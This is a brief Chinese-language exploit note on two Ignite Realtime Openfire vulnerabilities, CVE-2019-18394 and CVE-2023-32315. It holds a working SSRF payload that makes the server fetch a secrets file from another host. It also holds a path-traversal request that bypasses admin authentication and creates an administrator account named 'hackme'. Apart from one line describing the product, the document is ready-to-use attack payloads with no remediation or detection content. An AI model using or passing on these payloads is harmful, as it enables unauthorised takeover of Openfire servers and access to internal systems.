(CVE-2019-18394)(CVE-2023-32315)

openfire SSRF （CVE-2019-18394）

Ignite Realtime Openfire是Ignite Realtime社区的一款采用Java开发且基于XMPP（前称Jabber，即时通讯协议）的跨平台开源实时协作（RTC）服务器，它能够构建高效率的即时通信服务器，并支持上万并发用户数量。 该漏洞允许未授权用户发起SSRF攻击。

payload：http://192.168.85.130:18375/getFavicon?host=192.168.85.132:6666/secrets.txt?

Openfire管理后台认证绕过漏洞（CVE-2023-32315）

payload：http://192.168.85.130:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=hackme&name=&email=&password=hackme&passwordConfirm=hackme&isadmin=on&create=Create+User HTTP/1.1；Cache-Control: max-age=0；Cookie: csrf=csrftoken